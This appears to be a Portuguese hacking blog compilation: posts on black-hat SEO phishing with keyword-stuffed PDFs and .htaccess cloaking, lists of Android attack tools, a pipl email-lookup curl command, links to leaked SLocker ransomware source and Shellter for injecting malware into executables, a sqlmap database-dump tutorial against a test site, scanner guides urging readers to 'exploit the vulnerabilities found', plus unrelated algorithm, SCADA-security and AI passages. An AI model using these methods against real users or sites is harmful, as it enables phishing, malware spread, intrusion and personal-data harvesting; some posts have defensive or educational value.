sexta-feira, 29 de junho de 2018

PHISHING ATRAVÉS DE TÉCNICAS BL4CK H4T S30

Técnicas de phishing sofrem mutação a cada momento, seja por conta de um novo exploit ou pelo fato de determinada técnica não funcionar, mas uma coisa é certa o phishing sempre está em evolução.Em 2016 foi o ano que fiz minha pesquisa sobre a utilização de motores de busca no cenário de phishing onde com base em artigos, testes e um pouco de malicia consegui realizar tal conceito.Minha pesquisa consiste em mostrar algumas tricks que atacantes usam para gerar trafego legitimo em suas paginas maliciosas e ludibriar seu target ao download. 

O método:
 

Tal forma simples ainda garante muitos acessos quando se trata de forjar palavras chaves e concatenar o maior numero de técnicas Black Hat SEO em um arquivo / url, efetuado o upload do maior numero de arquivos PDF's "legítimos" com palavras chaves direcionados para um grupo de interesse.

Para entender o uso do PDF:

 

Em 2008, o Google anunciou em seu blog oficial que, a partir de agora, através da Optical Character Recognition (OCR), Que permite converter imagens com texto em documentos de texto usando algoritmos decomputação automatizados. As imagens podem ser processadas individualmente (arquivos .jpg, .png e .gif) ou em documentos PDF com várias páginas (.pdf).

A leitura e indexação de arquivos PDF não é novidade para ninguém, a tal ponto que criminosos também começaram a usar os benefícios de indexar documentos PDF para manipular resultados do Google.Os fraudadores usam documentos PDF fakes com palavras chaves , links e imagens para assim atingir o seu objetivo que seria destacar-se nos motores de busca. Em comparação com as páginas HTML comuns, O Google parece confiar mais e punir bem menos páginas PDF.

O procurado click:


O que seria fins maliciosos ?Seria direcionar o target para propagandas, exploração de vetores em seu navegador, ataques em seu roteador entre outras artimanhas.

O intuito muitas vezes não é só ludibriar o target para efetuar um simples download, mas sim lucrar o máximo com seu click, se o mesmo não executar o artefato assim garante uma forma de retorno financeiro.

Técnica Keyword Stuffing:
 

Tal forma de "manipulação" é bem antiga, mas ainda bem eficaz, mas hoje a sua evolução que pude perceber no decorrer da pesquisa é o seu uso como se fosse um "Spear Phishing", sim isso mesmo um "Spear Phishing" ele é feito de forma mais aberto porem restringindo suas palavras chaves, padrão de url's e até mesmo imagens a um determinado grupo.

O diferencial dessa técnica é que o pescador é passivo o mesmo não executa uma ação mais intrusiva, ele espera o acesso do seu target assim garantindo mais sucesso de infecções.

Gerando arquivos em massa:

 

Quando se trata de ações na web um atacante não quer perder tempo. Armado de seu arsenal sempre atualizado para otimizar seus processos. Por esse fato criei uma pequena tool que vai criar e injetar um conjunto de palavras chaves em nosso PDF's, para termos noção de uma estrutura final do arquivo de isca.

Algumas palavras chaves que serão usadas no processo:
Compre_seu,Carro_novo,usado,condicoes,gerais,semi_novo,Comprar,condições_gerais,porto_seguro,automóvel,Carro,Nossos,carros,Pick,up,SUV,Gol,VW,Up,Golf,Novo,Fox,computador,bordo,rodas,liga,leve,FRANQUIA,airbag,passageiro,freios,ABS,retrovisores,elétricos,Câmbio,automatico,automatizado,manual,Ofertas,Preços,Simular,financiamento,Fotos,Ficha,técnica,Tiguan,EXTRA... 

 Execução da ferramenta:
 

A lógica da ferramenta funciona da seguinte forma.Sua base é um arquivo preenchido com diversas palavras chaves direcionadas para um determinado grupo. geramos um PDF para cada palavra chave e cada palavra chave é vinculada ao nome do próprio arquivo e a ferramenta já cria links internos referenciando outros arquivos gerados, essa técnica pode ser usada como LINK FARM.

PDF forjado:
 

Usando elementos básicos de SEO é forjado o PDF isca para e é esse arquivo que o motor de busca vai indexar.


Garantindo o acesso:
Para "hackear" de forma expressiva e também garante o acesso das vítimas a suas (URL’S || arquivos maliciosos), O criminoso pode refinar o arquivo .htaccess de forma que o Bot de indexação (Web crawler) tenha acesso ao seu conteúdo, mas não o usuário alvo pois o mesmo é direcionado para site de terceiros.

Arquivo .htaccess modificado:

 
Lógica do atacante: isso é usado para que o motor de busca acesse o PDF forjado, porem o target só vê o cache do mesmo nos resultados assim garantindo uma engenharia social gerada pelo próprio motor de busca.

Busca infectada:
 






É uma exploração de relação de confiança entre usuário e seu aplicativo web "favorita", pois ele não vai oferecer o conteúdo "carros usados", para alguém que de suma maioria curtir páginas(facebook) ou pesquisa keywords para cinema ou faz pesquisa de Corte e Costura ou seja o target ativa o gatilho.

O uso do Google AdWords:


A grande trick referente conjunto de palavras chaves e potencializar o acesso é o anuncio pago que tal técnica não é só usada em motores de busca, mas também em redes sociais como Facebook. 
O patrocínio /anuncio pago de palavras chaves vinculadas aos seus arquivos forjados potencializa em mais de 50% as chaves de vitimas acessarem tal url infectada.

Com investimento de R$50,00 por dia filtrando alvos no estado de São Paulo o atacante pode ter alcance potencial de 1K cliques + 57k de impressões.
Achei o valor de 1k inflado pelo Google, mas suponhamos que tal valor real é de 500 cliques por R$50,00 analisando cenário comparativo com spammer comum o Black Hat SEO tem grande potencial spear pelo filtro avançado que própria ferramenta de propaganda oferece e pela assertividade de direcionar para pessoa certa.

Em minha humilde opinião redes sociais e motores de busca serão o futuro dos spammers, tanto pela assertividade filtro avançado de perfil quanto pela facilidade de atingir milhares de pessoas facilmente.
Um exemplo recente de Link patrocinado malicioso é o  Fake BSOD warning, onde o usuário ao clicar no link erá direcionado para uma página que simulava a tela azul de erro Windows (famosa tela da morte).
O Fake warning exibia uma mensagem orientando suas vitimas a discar o numero do "suporte" técnico, para obter a devida "ajuda".
Tal anúncio patrocinado aparecia e destaque quando a palavra chave "youtube" erá buscada no Google. Contatado pela Malwarebytes, o Google AdWords removeu imediatamente os anúncios fraudulentos.
A tela fake usada no modelo BSOD de ataque é uma variação das telas “Scan Virus Alert” que consiste simular um escaneamento ou um simples alerta de vírus, posteriormente oferecer uma “Ferramenta” ou telefone  para auxiliar na remoção de tal vírus, apesar de não muito usada no brasil essa técnica é bem antiga. Sua nova variação e mais avançada é voltada para publico mobile, algumas versões web pedem dados do cartão de credito e utilizam functions que podem fazer seu celular até mesmo vibrar.


O fluxo final seria dessa forma:

 

O usuário toma ação de efetuar uma pesquisa, em seu resultado de busca aparece tais urls infectadas seja no orgânico ou patrocinado, depois do clique o target pode entrar em vários cenários seja de baixar um PDF infectado ou PE até mesmo ter vários vetores explorados em seu navegador ou roteador. Bom esse é um cenário simplista, mas é possivel ter noção do potencial dessa tipo de técnica. 

Posso afirmar que hoje meios pagos de publicidade como Google AdWords, se tornaram um dos maiores vetores que proporcionam ataques. Fraudes envolvendo em publicidade paga é outro level quando falamos de spear phishing tanto quando se trata de facilidade e retorno lucrativo.

Qualquer pessoa pode criar uma conta no Google AdWords ou Facebook sem nem um tipo de verificação se X é dono da marca Y. muitas vezes o atacante usa técnicas de typosquatting para ludibriar seu target.
 
Não só o target user é afetado por tal técnica, mas também a empresa que teve sua marca vinculada ao ataque.
 
Ferramenta usada no post: forjaPDF (para estudos)
A ferramenta usada no artigo utiliza as class do projeto Dompdf

Material retirado do site 0x27null
 

ANDROID - FERRAMENTAS - RECOMENDADAS

E ae galera, segue a lista de algumas ferramentas:
 
1 - Python3 for Android
2 - Routerpwn
3 - Hash Decrypt
4 - dSploit
5 - DynDNS Client
6 - Mac Address Ghost
7 - Proxy Browser
8 - AirMon
9 - Router Brute Force
10 - Nessus
11 - Loic
12 - ProxyDroid
13 - Admin Panel Finder
14 - Root Browser
15 - DroidWall
16 - IP Tools
17 - Fing
18 - Bugtroid FREE
19 - ConnectBot
20 - SQLCipher Decrypt/Encrypt
21 - Wps Wpa Tester
22 - Wifi Password
23 - zANTI
24 - Intercepter-NG
25 - BusyBox Free
26 - Lan Droid

FERRAMENTAS - FORENSE

E ae galera, hoje trago pra vocês algumas ferramentas para forense.

1 - ChromeForensics
Uma ferramenta para realizar análises forenses automatizadas do navegador Chrome.
 
2 - Android-Forensics
AFLogical OSE: aplicativo e framework forense-android de código aberto
 
3 - Timesketch
O Timesketch é uma ferramenta de código aberto para análise colaborativa da linha de tempo forense.
 
4 - USBTracker
 
5 - Linux Security Auditing Tool (LSAT)
A Ferramenta de auditoria de segurança do Linux (LSAT) é um auditor de segurança pós-instalação para Linux / Unix. Ele verifica muitas configurações de sistema e configurações de rede locais no sistema para erros comuns de segurança / configuração e para pacotes que não são necessários. (Por enquanto) funciona sob Linux (x86: Gentoo, RedHat, Debian, Mandrake; Sparc: SunOS (2.x), Redhat sparc, Mandrake Sparc; Apple OS X)
 
6 - RAT Decoders
 
7 - Bro Network Security Monitor
Bro é uma poderosa estrutura de análise de rede que é completamente diferente do IDS típico que você conhece, com as vantagens de adaptabilidade, eficiência, flexibilidade, interface aberta e código aberto.
 
8 - Xplico
Xplico é uma ferramenta de análise forense de rede aberta para testes forenses digitais e de penetração.
 
9 - PowerForensics
O PowerForensics é uma estrutura de forense digital - Powershell. Ele atualmente suporta NTFS e adicionou o sistema de arquivos ext4 durante o processo de demonstração.
 
10 - GRR Rapid Response
GRR Rapid Response é uma estrutura de resposta de emergência de eventos que se concentra em forense de sites remotos. É um cliente Python proxy que é instalado no sistema alvo e pode gerenciar e comunicar a infraestrutura Python.
 
11 - Mozilla InvestiGator
 
12 - Autopsy
 
13 - JOy
Pode ser usado para capturar e analisar o pacote de dados de tráfego de rede, principalmente para levantamento de rede, monitoramento de segurança e forense.
 
14 - Rekall
O framework Rekall é um conjunto totalmente aberto de ferramentas projetadas para introduzir a tecnologia e a complexidade do forense digital a partir da RAM e fornecer uma plataforma para uma pesquisa mais profunda nesta área.
 
15 - FastIR Collector
O que pode ser coletado inclui tudo o que você pode pensar.. memória, registro, informações de arquivos e assim por diante.

BUSCANDO EMAIL REGISTRADO EM SITES

E ae galera, trago pra vocês uma API de um site que mostra onde o email esta cadastrado.

O site é pago, então se você for continuar usando você vai precisar criar outra conta ou pagar. Uma hora a key da API inspira.

Vamos nos registrar.

1. Entre no site: pipl.com/api
2. Clique em start for free e registre-se.

Após terem confirmado o email, entrem na conta.

Depois vá em API





Clique em "GET MY FULL API KEYS"

Copie uma key, de preferencia a do tópico "Social".

Não precisa copiar tudo, copie apenas depois do hífen do DEMO

Exemplo: SOCIAL-PREMIUM-DEMO-fijegjierij34k523kitrmk

copie apenas o fijegjierij34k523kitrmk

Depois, abra um terminal e digite:

curl http://api.pipl.com/search/\?email=EMAIL\&key=KEY | grep -i 'url'
Exemplo: 
curl http://api.pipl.com/search/\?email=fsocietybrasil@google.com\&key=fijegjierij34k523kitrmk | grep -i 'url'


ANÁLISE DE ALGORITMO: ANÁLISE ASSINTÓTICA

Segundo o Wikipedia, um Algoritmo é:

(…) uma sequência finita de instruções bem definidas e não ambíguas, cada uma das quais devendo ser executadas mecânica ou eletronicamente em um intervalo de tempo finito e com uma quantidade de esforço finita.

A sua aplicação pode ser composta por uma porção de algoritmos, cada um destinado a um fim muito específico. Por exemplo, você pode ter um algoritmo responsável por encontrar todos os pedidos vendidos no último mês, que contenham um determinado produto. Com o advento do Big Data, inúmeros algoritmos são postos em prática para mineração e análise de dados, então, mesmo que exista uma aplicação ou serviço resolvendo esses problemas para você, acredite… os algoritmos estarão lá.


Um determinado algoritmo pode ter tempos de execução relativamente diferentes de acordo com o ambiente no qual ele esteja rodando. Se for num computador Core i7 e 16GB de RAM, é possível assumirmos que ele rodará consideravelmente melhor do que se estivesse operando em um Raspberry Pi, por exemplo. Ainda há um segundo cenário onde, talvez você tenha escrito o algoritmo perfeito em Python ou Ruby, mas ele corre o risco de executar de forma mais lenta que um algoritmo em Assembly ou C.

Partindo da premissa que um bom algoritmo é um conjunto de operações que resolvem um problema em tempo e esforço atrativos, como podemos classificar se um algoritmo é “rápido” ou não?

É aí que entra a análise assintótica.
  
A Análise Assintótica
Segundo o Wikibooks, a análise assintótica é:
(…) a way of expressing the main component of the cost of an algorithm, using idealized (not comparable) units of computational work.
Em termos mais práticos, é uma forma de julgarmos se o nosso algoritmo é eficiente, independente dos “recursos que o cercam” (como velocidade de processamento, quantidade de memória, latência de rede, etc).
Removendo todas as variáveis que podem influenciar no tempo de execução, focamos nossas atenções em como o algoritmo está escrito, em qual é a sua entrada, e se “ele por si” é a maneira mais eficiente para a resolução de um determinado problema.

Vale reforçar que a entrada é um fator de extrema importância no que tange a análise assintótica. A análise é “input bound”, ou seja, a entrada influenciará diretamente no resultado do estudo. Por exemplo, quando ordenamos um vetor de tamanho N, utilizando o algoritmo Selection Sort, teremos um tempo de execução de N2 (já que o algoritmo pega um número, e compara com os demais números no vetor, repetindo essa operação até chegar ao fim do dado estruturado).

Ao fim da análise, podemos chegar a 2 conclusões diferentes: Melhor cenário e pior cenário.

Big O, Big Omega e Big Theta
Quem trabalha com desenvolvimento (ou até mesmo com computação num geral), já deve ter ouvido falar sobre o famigerado Big O Notation. Ele é uma notação assintótica muito famosa na análise de tempos de execução de algoritmos. O que pode ser uma surpresa é que ele não é a única notação que temos disponível:
  • O(n): Expressa o limite superior do tempo de execução de um algoritmo (pior cenário);
  • Ω(n): Expressa o limite inferior do tempo de execução de um algoritmo (melhor cenário);
  • Θ(n): Expressa limite superior e inferior do tempo de execução de um algoritmo (pior e melhor cenário). 
Além da expressão linear, temos outras notações que descrevem diferentes tempos de execução:
  • O(1): Constante
  • O(log n): Logarítmica
  • O(n): Linear
  • O(n log n): “Linearithmic” (maior que linear, menor que quadrática)
  • O(n2): Quadrática 
  • O(n3): Cúbica
  • nO(1): Polinomial
  • 2O(n): Exponencial 
De maneira simplista, N pode ser considerado como o número de operações que o algoritmo leva para chegar ao seu final. N está intimamente ligado com a entrada do seu algoritmo, onde quanto maior for o seu número, maior será o seu tempo de execução.

E como fazemos para contar o número de operações realizadas por um algoritmo?

Um pouquinho de prática
Voltando a citar o Selection Sort, que trata-se de um “greedy algorithm” para ordenação de números em um vetor, temos a seguinte sequencia de operações:
for i from 1 to n-1 {
    Encontre um elemento menor que a i-ésima posição, entre as n entradas.
    Troque o elemento encontrado com a i-ésima entrada.
}
 Fazendo um pequeno teste de mesa, com o vetor (9, 2, 5, 7, 4, 8), temos o seguinte conjunto de procedimentos:
  1. [9, 2, 5, 7, 4, 8]: i=1; Encontre o menor número entre posições 1 e 6; Troque array com array[2]
  2. [2, 9, 5, 7, 4, 8]: i=2; Encontre o menor número entre posições 2 e 6; Troque array com array[5]
  3. [2, 4, 5, 7, 9, 8]: i=3; Encontre o menor número entre posições 3 e 6; Troque array com array[3]
  4. [2, 4, 5, 7, 9, 8]: i=4; Encontre o menor número entre posições 4 e 6; Troque array com array[4]
  5. [2, 4, 5, 7, 9, 8]: i=5; Encontre o menor número entre posições 5 e 6; Troque array com array[5]
  6. [2, 4, 5, 7, 8, 9]: i=6; Fim do laço

Podemos separar a análise em 3 grupos:
  • Tempo de execução para encontrar o menor elemento
  • Tempo de execução para trocar de elemento
  • Tempo de execução do laço
  • Embora seja possível fazer uma análise detalhada, levando em consideração o número de passos dentro de uma operação de swap de valores, e a aritmética envolvendo as N-i-1 chamadas que ocorrem dentro da função “Encontre o menor número entre posições”, para fins didáticos vamos adotar uma abordagem superficial.
 Selecionar o menor elemento no array e fazer o swap para a primeira posição requer passar por todos os N-1 elementos. Encontrar o próximo menor elemento requer analisar os N-1 elementos restantes. Com dois for aninhados, executando em ordem N, já podemos esperar uma execução em O(N2). É possível usar a progressão aritmética para comprovar essa hipótese:

(n − 1) + (n − 2) + ... + 2 + 1 = n(n - 1) / 2 ∈ Θ(n<sup>2</sup>)

Se revisarmos o algoritmo apresentado, é possível reparar que o Selection Sort tem no seu melhor e pior cenário o tempo de execução de N2, logo, podendo ser classificado como Θ(N2).

Material retirado do site: Profissionais Ti

ENGENHARIA SOCIAL - QRLJacking

E ae galera, apresento pra vocês a ferramenta QRLJacking.

QRLJacking é um vetor de ataque de engenharia social simples capaz de sequestro de sessão afetando todos os aplicativos que dependem do recurso "Login com código QR" como forma segura de fazer login nas contas. Em poucas palavras, a vítima "varre" o código QR do invasor, que resulta em sequestro de sessão.

Artigo: securityonline

Download: https://github.com/OWASP/QRLJacking

Demo
 
 

ANDROID - RANSOMWARE

O código-fonte de uma das mais antigas famílias de ransomware para dispositivos móveis e populares foi vazado on-line, tornando-o disponível para cibercriminosos que podem usá-lo para desenvolver variantes mais personalizadas e avançadas do ransomware Android.

O código-fonte do resgate do SLocker , que viu um aumento de seis vezes no número de novas versões nos últimos seis meses,foi vazado no GitHub e agora está disponível para quem quiser.

O código-fonte do SLocker foi vazado por um usuário que usa 'fs0c1ety' como um moniker online e pede a todos os usuários do GitHub que contribuam para o código e enviem relatórios de erros.

SLocker ou Simple Locker é tela de bloqueio móvel e ransomware de criptografia de arquivos que criptografa arquivos no telefone e usa a comunicação Tor for command and control (C & C). O malware também se colocou como órgãos de aplicação da lei para convencer as vítimas a pagar o resgate.Famosa por infectar milhares de dispositivos Android em 2016, pesquisadores de segurança descobriram mais de 400 novas variantes do resgate de SLocker em estado selvagem em maio, e logo depois de um mês, o desagradável sistema de ransomware Android foi visto copiando a GUI do WannaCry.Uma vez infectado, o SLocker corre silenciosamente no fundo do dispositivo de uma vítima sem o seu conhecimento ou consentimento e criptografa imagens, documentos e vídeos em dispositivos móveis.Uma vez que tenha arquivos criptografados no dispositivo, o ransomware do Android seqüestra o telefone,Por que você deveria se preocupar?Estando em ação a partir de 2015, a SLocker se destaca como uma das primeiras amostras de ransomware para criptografar arquivos do Android. O malware modificou-se além de apenas bloqueando telas e exigindo pagamento para assumir os direitos administrativos e controlar o microfone, altifalantes e a câmera do dispositivo.

E agora, desde que o código-fonte deste ransomware Android desagradável foi lançado on-line no GitHub, os dispositivos Android provavelmente receberão um número crescente de ataques de resgate nos próximos dias.O código fonte vazado seria uma oportunidade de ouro para aqueles que sempre buscam oportunidades como esses programas de malware apenas são oferecidos para venda em fóruns subterrâneos, mas o SLocker agora está acessível para cibercriminosos e fraudadores GRATUITAMENTE.No início deste ano, os pesquisadores descobriram uma variante do BankBot banking trojan in the wild, que foi desenvolvido usando o código-fonte vazado para o malware em um fórum subterrâneo de hacking.

Como se proteger?
Como mencionei anteriormente, os usuários sempre recomendam seguir algumas precauções básicas para se proteger contra tais ameaças:
  • Nunca abra anexos de email de fontes desconhecidas.
  • Nunca clique nos links em mensagens SMS ou MMS.
  • Mesmo que o e-mail pareça legítimo de alguma empresa, vá diretamente para o site de origem e verifique todas as atualizações possíveis.
  • Vá para Configurações → Segurança e Desligue "Permitir a instalação de aplicativos de fontes diferentes da Play Store".Mantenha sempre seus dispositivos Android, aplicativos e aplicativos antivírus atualizados.
  • Evite hotspots Wi-Fi desconhecidos e não protegidos e mantenha o Wi-Fi desligado quando não estiver em uso.

Link: https://github.com/fs0c1ety/SLocker

Hacker Security.

MATERIAL PARA CRIAÇÃO DE CHEATS


E ae galera, aqui vai alguns links de vídeos para criação de cheats.


É importante lembrar que você deve manjar de uma linguagem de programação, como por exemplo (e recomendo): C#.









INJEÇÃO DE DLL: https://hackerbot.net/wiki/159-dll-inject-injection-hacks-cheats

FERRAMENTA - EXPLORAÇÃO DE VULNERABILIDADES EM MODEM / ROTEADOR

E ae galera, trago pra vocês a ferramenta RouterSploit.

O RouterSploit nada mais é que um framework de exploração em modem / roteadores.

Github: https://github.com/threat9/routersploit

Seu módulos para o pentest:
exploits - módulos que aproveitam as vulnerabilidades identificadas creds - módulos projetados para testar credenciais contra serviços de rede
scanners
- módulos que verificam se um alvo é vulnerável a qualquer exploit
payloads - módulos responsáveis ​​por gerar payloads para várias arquiteturas
generic - módulos que executam ataques genéricos

 Instalação
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Demo


GARANTINDO SEGURANÇA EM UM AMBIENTE SCADA

Os ambientes SCADA (Supervisory Control And Data Acquisition, ou Controle de Supervisão e Aquisição de Dados) consistem de sistemas para controle industrial, implementados em grande escala, que tem como função principal monitorar, gerenciar e administrar infraestruturas críticas em diversos segmentos como transporte, energia nuclear, energia elétrica, gás, água etc.

Um ambiente SCADA interliga sistemas industriais, sistemas de comando e sistemas HMI (Human Machine Interface, ou Interface Humano-Máquina), presente em indústrias de grande porte.

A evolução da arquitetura SDACA trouxe a utilização de robôs, sistemas de medição, ferramentas de comando e de controle e sistemas de manutenção remota, todos sendo interligados através de uma rede IP tradicional. Como são administrados em ambientes altamente vulnerável, como a interface HMI, geralmente são utilizados sistemas operacionais sem correções do Windows, já que muitas vezes as atualizações e correções destes sistemas não são feitas por medo de prejudicar o ambiente industrial. Isso torna este ambiente muito sensível e propenso a ataques de cibercriminosos. Estas brechas permitem que hackers tomem total controle de uma indústria.

O ataque do Stuxnet contra o Irã chamou a atenção de todo o mercado de segurança para vulnerabilidades dos sistemas SCADA, aplicado em diversas indústrias. O Stuxnet ilustrou a urgente necessidade da aplicação de modernas técnicas de segurança, como os que são implementados em uma rede corporativa. Não existem padrões, porem podem ser seguidas boas práticas definidas pela North American Electric Reliability (NERC) ou organizações nacionais como o IPT e a ABNT, além do Inmetro. Existem outros passos importantes que devem ser tomados para assegurar a segurança de um ambiente SCADA:

Atualizações constantes
Correções de softwares e sistemas operacionais, além de suas aplicações, é essencial em ambientes SCADA para evitar falhas de segurança devido a vulnerabilidades conhecidas. Quando pensamos em vulnerabilidades desconhecidas e novas, um passo importante é a implementação de uma ferramenta continua de detecção e análise de vulnerabilidades, isso permite interceptar ameaças antes que elas afetem a rede ou o servidor de destino, com isso tomamos medidas proativas para evitar ataques, eliminamos interrupções no serviço e respondemos de forma rápida e em tempo real contra qualquer tipo de ameaça.

Isolamento da rede SCADA
Isolar a rede SCADA das outras é um dos passos mais importantes. Para este fim, o uso de um mecanismo de bloqueio permitirá a segmentação da arquitetura SCADA. Desta forma, a rede HMI estará separada dos robôs, dispositivos de medição, sistemas de supervisão, unidades de controle remoto e infraestruturas de comunicação, permitindo que cada ambiente seja confinado e protegido de ataques individualmente. As redes SCADA precisam ser protegidas contra qualquer tipo de malware e intrusões da mesma forma que as redes empresariais, usando Sistemas de Prevenção de Intrusões (IPS) e soluções anti-malware, que não são apenas específicas para o SCADA.

Protocolo de Validação
Após a divisão de um sistema SCADA, o próximo passo lógico é aplicar um protocolo de validação e controle relacionados aos seus componentes. Além disso, é importante certificar-se de que o aplicativo que gera protocolos é um aplicativo legítimo, gerado a partir da estação de trabalho correta.

Separar os administradores dos usuários
Após a separação e validação do sistema SCADA, um passo importante é a separação dos usuários e administradores, fornecendo diferentes níveis de acesso entre os grupos. Por exemplo, um administrador pode ter acesso completo, incluindo alterações de configuração através do HMI, enquanto que o usuário pode ter acesso a somente a leitura.

Obter uma visão geral da rede
É de extrema importância que os administradores tenham a capacidade de entender o real estado da segurança de uma rede, por exemplo, saber ao mesmo tempo o estado do robô, o nível de correção HMI e sua relação com um usuário ou um componente específico, para isso é importante uma ferramenta de correlação e de gestão de eventos. O administrador quando entende o que está acontecendo em sua rede, possui a capacidade de reagir corretamente contra eventos de rede e tomar as ações apropriadas antecipadamente.

Conclusão
É fundamental que as industriais percebam a importância da segurança integrada em seus ambientes SCADA, pois os ataques estão cada vez mais sofisticados e direcionados. Ao fazer isso, tem-se a capacidade de controlar as redes, usuários e aplicações, de forma proativa evitando possíveis riscos potenciais. As indústrias também devem se equipar com ferramentas projetadas por equipes especializadas para identificar possíveis problemas em tempo real e serem capazes de responder rapidamente quando uma ameaça é confirmada.

PRINCIPAIS CANAIS DO YOUTUBE SOBRE TECNOLOGIA/HACKER

PRINCIPAIS CANAIS DO YOUTUBE SOBRE TECNOLOGIA/HACKER
 

INJETANDO MALWARE EM APLICAÇÕES .EXE

E ae galera, ja pensaram em injetar aquele malware em algum arquivo PE? :D

Essa ferramenta faz isso: https://www.shellterproject.com/download/

Requisitos: wine instalado 

Demo


FERRAMENTA - WPSeku

E ae galera, venho apresentar pra vocês uma ferramenta para buscar falhas na plataforma WordPress
 
 

 

FILMES/SERIES/DOCUMENTÁRIOS VOLTADOS A TECNOLOGIA




 

INVASÃO A SITES - SQLMAP - BÁSICO

E ae galera, hoje vamos fazer uma invasão a um banco de dados de um site.

Apresentação - SQLMAP
Sqlmap é uma ferramenta open source para teste de penetração que automatiza o processo de detecção e exploração de vulnerabilidades a Injeção de SQL.


Instalação

sudo apt install sqlmap
ou visite: sqlmap.org

Após a instalação
Nesse tutorial irei demonstrar o uso da ferramenta em um site chamado Home of Acunetix Art (testphp.vulnweb.com) onde os desenvolvedores do ambiente permitem esses tipos de testes de invasão.

Executando o sqlmap:
sqlmap -u http://testphp.vulnweb.com/search.php?test=query –dbs
 Usando o método GET, passamos os seguintes paramentos:
-u: URL DO SITE 
--dbs: LISTA OS BANCO DE DADOS DO SITE


Durante o processo de execução o SQLMAP já detecta que o banco de dados do site é MySQL e você pode ser questionado se deseja pular a verificação para outros tipos de banco de dados ou se você que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).



Neste momento o SQLMAP já detectou que o parâmetro cat está vulnerável e você é questionado se deseja realizar outros testes, no momento selecione N (Not/Não).


Como pode visualizar os banco de dados são exibidos: 
[*] acuart
[*] information_schema 



Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.
sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables
Parâmetros:
-D: Define o banco de dados que será avaliado.
acuart: Banco de dados do site.
–-tables: Lista todas as tabelas do banco de dados informado.

Como resultado são extraídas 8 tabelas do banco de dados acuart. 
 
+ artists
+ carts
+ categ
+ featured
+ guestbook
+ pictures
+ products
+ users
 

 


Vamos extrair todas as colunas existentes na tabela users.
 sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users --columns
Parâmetros:
-T: Define a tabela que será avaliada.
users: Tabela do banco de dados acuart.
–-columns: Lista todas as colunas da tabela users.
Como resultado são extraídas 8 colunas da tabela users.

+ address
+ cart
+ cc
+ email
+ name
+ pass
+ phone
+ uname


Neste passo iremos realizar o DUMP ou seja extrair todas as informações cadastradas nas colunas da tabela users.
sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart -T users -C name,pass,uname,email --dump
Parâmetros: 
-C: Define as colunas que será avaliada.
name,pass,uname,email: Lista das colunas da tabela users.
--dump: Extrai todas as informações contidas nas colunas da tabela informada.
Segue abaixo todos os dados extraídos:
pass: test
name: John Smith (porem bugado)
uname: test
email: email@email.com



  Com as informações extraídas realize o acesso ao sistema:

Site: testphp.vulnweb.com/login.php
Username: test
Password: test




Foi um tutorial básico, Sqlmap é uma ferramenta muito grande, tem varias opções. 




FERRAMENTA - a2sv

E ae galera, trago essa ferramenta de scan para vocês. O a2sv é uma ferramenta que busca vulnerabilidades em SSL.

Instalação
git clone https://github.com/hahwul/a2sv.git
cd a2sv
./install-sh

Após o download e instalação, rode o comando:
python a2sv.py -t ALVO

Parâmetros:
-t = parametro passado para por o alvo em seguida
ALVO = site ou ip

Demonstração:
python a2sv.py -t google.com

Resultado:



Referencia da falha encontrada:
https://www.owasp.org/index.php/Testing_for_CSS_Injection_(OTG-CLIENT-005)

SISTEMAS OPERACIONAIS

Fala galera, aqui estão alguns sistemas operacionais e um link com coisas relacionadas a vários sistemas operacionais

Grande Porte: São sistemas utilizados em grandes computadores, conhecidos como mainframe.
Exemplos: z/OS, OS/390

Servidores: São sistemas que trabalham em rede fornecendo algum tipo de serviço para os usuários. Ex.: servidor de arquivos, impressão, antivírus etc.
Exemplos: Windows Server, Debian, Slackware, CentOS, BSD

Pessoais: Esses sistemas são os mais utilizados pelos usuários comuns e geralmente são fáceis de utilizar.
Exemplos: Windows, MacOs, Ubuntu, Fedora

Portáteis: Sistemas desenvolvidos especificamente para equipamentos móveis, como: celular, tablet, smartphones.
Exemplos: IOS, Android, Windows Phone, Firefox IOS

Embarcados: São sistemas simples desenvolvidos para atender uma necessidade bem específica. Podemos encontrar esse tipo de sistema em micro-ondas, geladeiras, relógio ponto.
Exemplos: QNX, VxWorks.

Tempo Real: Esses tipos de sistemas precisam ter um tempo de resposta muito rápido para não comprometer as tarefas que ele exerce. Geralmente esses sistemas trabalham em situações críticas, como controle de tráfego aéreo, sistema de freio ABS.
Exemplos: FreeRTOS, AIX, CMX

Smart Cards: São sistemas que rodam em pequenos cartões, como cartão de crédito, telefonia móvel, cartões de fidelidade.
Exemplos: JavaCard, MS Windows Card, ZeitControl Basic Card

Multiprocessadores: Esses sistemas têm a capacidade de trabalhar com vários processadores simultaneamente.
Exemplos: K42


LINK:  https://mega.nz/#F!lJwmEabD!47Vj_JjOVzVMmS4eWn6O7A

LEVANTANDO VULNERABILIDADES DE UM SITE - VEGA

E ae galera, hoje eu vou apresentar pra vocês o scan de vulnerabilidades Vega.

Apresentação
Vega é um scanner de segurança web gratuito e de código aberto e plataforma de teste de segurança web para testar a segurança de aplicações web.

Instalação
apt-get uptade apt-get install vega 

ou visite: subgraph.com/vega/download/index.en.html

Após ter o Vega instalado, inicie ele.


Esse é a interface do Vega.  

Vamos realizar um scanner. 

Aperte CTRL + N


 Coloque o site desejado e de Next
 


Vai aparecer duas caixinhas, essas caixinhas vem marcadas com as principais vulnerabilidades, você desmarcando e marcando o Vega ira fazer um scanner profundo, com mais de 20 opções de scanner. 



Vai aparecer essas opções, são de cookies e autenticação de identidade na hora do scanner, isso vai de vocês colocarem ou não.


Clicamos em Finish. 

O scanner vai começar, pode demorar, dependendo das opções que você colocou, da sua internet ou se você esta utilizando alguma VPN ou PROXY.

Após de um certo tempo, meu scanner terminou e retornou as falhas que eu queria.


Depois disso é só explorar as vulnerabilidades encontradas :). Foi um tutorial básico, o Vega tem varias outras configurações.

INTELIGÊNCIA ARTIFÍCIAL

Inteligência Artificial (IA) é um ramo da ciência da computação que se propõe a elaborar dispositivos que simulem a capacidade humana de raciocinar, perceber, tomar decisões e resolver problemas, enfim, a capacidade de ser inteligente.

Existente há décadas, esta área da ciência é grandemente impulsionada com o rápido desenvolvimento da informática e da computação, permitindo que novos elementos sejam rapidamente agregados à IA.

História

